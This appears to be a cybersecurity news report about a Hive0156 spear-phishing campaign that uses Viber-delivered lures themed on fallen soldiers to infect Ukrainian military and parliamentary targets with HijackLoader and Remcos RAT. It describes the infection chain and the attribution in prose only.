Weaponizing Grief: Hive0156 Exploits Military Families in High-Stakes Phishing

Military and governmental institutions have once again found themselves in the crosshairs of a sophisticated spear-phishing campaign, where adversaries exploit the most poignant societal anxieties as a catalyst for deception. Cybersecurity experts have identified these emotionally charged lures as the primary mechanism for a newly discovered offensive.

The operation is attributed to the threat actor Hive0156. According to the 360 Threat Intelligence Center, this group has intensified its data-exfiltration efforts throughout 2025, specifically targeting defense and administrative bodies, with a particular focus on the Verkhovna Rada.

Viber served as the initial vector for dissemination. Potential victims received archives bearing deceptively innocuous titles, containing shortcuts masquerading as official parliamentary documentation. These included fabricated queries from the Verkhovna Rada, scanned appeals from the kin of fallen servicemen, and appendices detailing casualty statistics from recent years. The thematic content was meticulously curated to elicit an urgent emotional response, compelling the recipient to engage with the file immediately.

Upon execution, the user is presented with the anticipated document, while a labyrinthine infection chain simultaneously unfurls within the system. Obfuscated PowerShell scripts are triggered in the background, fetching additional payloads from remote command-and-control servers. To circumvent defensive perimeters, the attackers employ advanced evasion tactics such as DLL Sideloading, non-standard control flow transitions, and the in-memory manipulation of legitimate system modules.

The HijackLoader utility plays a pivotal role in this orchestration, performing environment reconnaissance, neutralizing antivirus software, and establishing persistence via the Task Scheduler. To mask its malicious intent, the code mimics the behavior of legitimate Windows libraries and dynamically generates environment variables, ensuring each infection remains distinct and difficult to signature.

The ultimate objective of the operation is the deployment of the Remcos Remote Access Trojan (RAT). Though commercially marketed as an administrative tool, Remcos has long been a staple in espionage campaigns. Once entrenched, it grants the adversary absolute dominion over the compromised host, facilitating data theft, remote command execution, and real-time screen surveillance through a sophisticated graphical interface.

Analysts observe that the methodologies employed—from the selection of victims and the use of instant messaging for delivery to the specific pairing of HijackLoader and Remcos—align perfectly with the established signatures of UAC-0184. This confluence of factors allows for the attribution of the campaign with a high degree of confidence.

Experts reiterate that such incursions target psychological vulnerabilities rather than technical flaws. In the current climate, subjects such as the fate of the fallen and family reparations serve as potent instruments of social engineering, transforming a cyber threat into a profound psychological ordeal.